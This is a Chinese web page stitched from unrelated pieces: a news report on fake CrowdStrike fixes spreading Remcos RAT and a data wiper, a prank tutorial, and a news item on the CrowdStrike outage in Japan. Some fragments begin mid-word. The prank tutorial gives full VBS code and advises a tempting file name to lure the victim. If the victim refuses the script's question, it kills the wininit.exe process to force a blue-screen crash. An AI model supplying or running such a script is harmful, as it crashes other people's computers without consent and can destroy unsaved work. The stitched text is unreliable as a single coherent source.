上周五因CrowdStrike更新BUG導(dǎo)致全球Windows系統(tǒng)電腦出現(xiàn)大范圍“藍(lán)屏”后,該公司發(fā)出警告稱,一些網(wǎng)絡(luò)犯罪分子開(kāi)始利用虛假的CrowdStrike更新來(lái)傳播惡意軟件。
7月20日(周六),網(wǎng)絡(luò)安全研究人員 g0njxa 首次報(bào)告了針對(duì) BBVA 銀行客戶的惡意軟件活動(dòng),該活動(dòng)以虛假 CrowdStrike 修補(bǔ)程序更新的形式安裝Remcos RAT惡意軟件。
在該攻擊鏈中,虛假修補(bǔ)程序通過(guò)名為portalintranetgrupobbva的釣魚網(wǎng)站傳播,并偽裝成 BBVA Intranet 門戶。涉及分發(fā)的名為“crowdstrike-hotfix.zip”的 ZIP 存檔文件中包含一個(gè)名為 Hijack Loader(又名 DOILoader 或 IDAT Loader)的惡意軟件加載程序,該加載程序反過(guò)來(lái)啟動(dòng) Remcos RAT 有效載荷。存檔文件還包括一個(gè)文本文件 (“instrucciones.txt”),其中包含西班牙語(yǔ)說(shuō)明,敦促受害者運(yùn)行可執(zhí)行文件以從問(wèn)題中恢復(fù)。
偽裝成 CrowdStrike修補(bǔ)程序的惡意軟件加載程序
而在另一起事件中,親伊朗的黑客組織Handala冒充CrowdStrike官方郵件,給以色列公司假裝創(chuàng)建讓W(xué)indows系統(tǒng)重新運(yùn)行的工具,但實(shí)際上是在分發(fā)數(shù)據(jù)擦除器。
黑客組織Handala 送的冒充CrowdStrike的網(wǎng)絡(luò)釣魚電子郵件
這些電子郵件包括一份虛假更新的PDF說(shuō)明,以及從文件托管服務(wù)下載惡意ZIP存檔的鏈接。此ZIP文件包含一個(gè)名為“Crowdstrike.exe”的可執(zhí)行文件,該文件一旦執(zhí)行,數(shù)據(jù)擦除器將被提取到 %Temp% 下的文件夾,并啟動(dòng)執(zhí)行數(shù)據(jù)擦除操作。
CrowdStrike首席執(zhí)行官George Kurtz提醒廣大企業(yè)及用戶,要保持警惕,確保是通過(guò)真正的官方渠道來(lái)獲得更新并解決問(wèn)題。
參考來(lái)源:
https://www.bleepingcomputer.com/news/security/fake-crowdstrike-fixes-target-companies-with-malware-data-wipers/#google_vignette
算機(jī)藍(lán)屏簡(jiǎn)稱BSOD,又叫藍(lán)屏死機(jī)。藍(lán)屏死機(jī)提示已經(jīng)成為Microsoft Windows操作系統(tǒng)標(biāo)志性的畫面。藍(lán)屏死機(jī)主要是Microsoft Windows 系列操作系統(tǒng)為保護(hù)電腦數(shù)據(jù)文件不被破壞而強(qiáng)制顯示的屏幕圖像。
愚人節(jié)即將來(lái)臨,有許多人絞盡腦汁想各種整人辦法。雖然電影《整蠱專家》里面有許多奇葩的惡作劇方法,但是電影源于現(xiàn)實(shí)又高于現(xiàn)實(shí),里面有些方法學(xué)不來(lái)。近期使用計(jì)算機(jī)學(xué)習(xí)的小伙伴比較多,今天就用代碼制作一個(gè)計(jì)算機(jī)藍(lán)屏。
第一步:右鍵單擊桌面空白位置,新建一個(gè)文本文檔,并將“新建文本文檔.txt”重命名為“打開(kāi)試試.vbs”。
VBS是基于Visual Basic的腳本語(yǔ)言,我們使用vbs代碼實(shí)現(xiàn)惡作劇,所以需要將文件后綴名改為“*.vbs”。文件名可以改的吸引人一些,好奇心害死貓。
第二步:右鍵單擊“打開(kāi)試試.vbs”,選中右鍵菜單中的編輯,打開(kāi)記事本編輯窗口。將以下代碼復(fù)制粘貼到記事本中,同時(shí)按下鍵盤上的Ctrl + S鍵保存編輯。
如果想修改提示語(yǔ)句的話,將引號(hào)中的中文修改成自己想要的內(nèi)容即可。
代碼區(qū)域:
If MsgBox("你愿意做我的女朋友嗎?",vbYesNo,"提示")=vbyes then
Msgbox "你竟然同意了,好開(kāi)心!"
Wscript.echo Printer(" ","*","113111111112212111313111513",7)
Function Printer(a1,a2,b,c)
For i=1 to len(b)
b1=Mid(b,i,1)
For j=1 to b1
s=s & " " & a1
n=n + 1
if n=c then
s=s & chr(10)
n=0
End if
Next
a3=a1
a1=a2
a2=a3
Next
Printer=s
End function
Set ws=CreateObject("Sapi.Spvoice")
k="我愛(ài)你"
ws.speak k
Else
Msgbox "被拒絕了,真的好傷心!"
Msgbox "由于程序太過(guò)傷心,系統(tǒng)即將崩潰!!!",64,"系統(tǒng)提示:"
Set ws=Createobject("wscript.shell")
ws.run "cmd /c start /min taskkill /f /im wininit.exe",0,false
End if
VBS程序介紹:程序起始給對(duì)方一個(gè)選擇題,如果對(duì)方選擇“是”,那么就相安無(wú)事,并有文字組合圖片和語(yǔ)音表白“我愛(ài)你”提示。如果對(duì)方選擇“否”,將會(huì)有提示語(yǔ)句,接著計(jì)算機(jī)進(jìn)入藍(lán)屏。
解決藍(lán)屏的辦法只能重啟計(jì)算機(jī)。請(qǐng)勿亂用這個(gè)vbs代碼,以免給他人造成損失。
一旦程序運(yùn)行該怎么終止呢?千萬(wàn)不要嘗試關(guān)閉窗口來(lái)結(jié)束程序。
同時(shí)按下鍵盤上的Shift + Ctrl + Delete,啟動(dòng)任務(wù)管理器。在任務(wù)管理器的進(jìn)程中找到并選中“wscript.exe”,點(diǎn)擊結(jié)束進(jìn)程就沒(méi)事了。
如果喜歡請(qǐng)點(diǎn)擊關(guān)注和轉(zhuǎn)發(fā),有更多計(jì)算機(jī)小技巧等著你來(lái)發(fā)現(xiàn)。
月19日,日本東京時(shí)間19日13時(shí)30分左右開(kāi)始,日本地區(qū)運(yùn)行微軟視窗(Windows)操作系統(tǒng)的電腦陸續(xù)開(kāi)始出現(xiàn)訪問(wèn)異常問(wèn)題。據(jù)美國(guó)微軟日本子公司確認(rèn),安裝了美國(guó)網(wǎng)絡(luò)安全企業(yè)“群集打擊”(CrowdStrike)軟件的計(jì)算機(jī)上出現(xiàn)了該問(wèn)題。
據(jù)報(bào)道,CrowdStrike日本子公司稱,安裝了該公司安全軟件“Falcon”的電腦出現(xiàn)“藍(lán)屏”,表明Windows出現(xiàn)訪問(wèn)異常問(wèn)題。CrowdStrike日本子公司發(fā)言人表示已經(jīng)意識(shí)到這一問(wèn)題,正在調(diào)查原因并考慮對(duì)策。據(jù)報(bào)道,一家使用了CrowdStrike軟件的公司表示,19日13時(shí)40分左右,其辦公室電腦陸續(xù)出現(xiàn)藍(lán)屏,重啟一段時(shí)間后又出現(xiàn)藍(lán)屏,導(dǎo)致無(wú)法工作。
來(lái)源:央視新聞
爆料、維權(quán)通道:應(yīng)用市場(chǎng)下載“晨視頻”客戶端,搜索“幫忙”一鍵直達(dá)“晨意幫忙”平臺(tái);或撥打熱線0731-85571188。政企內(nèi)容服務(wù)專席19176699651。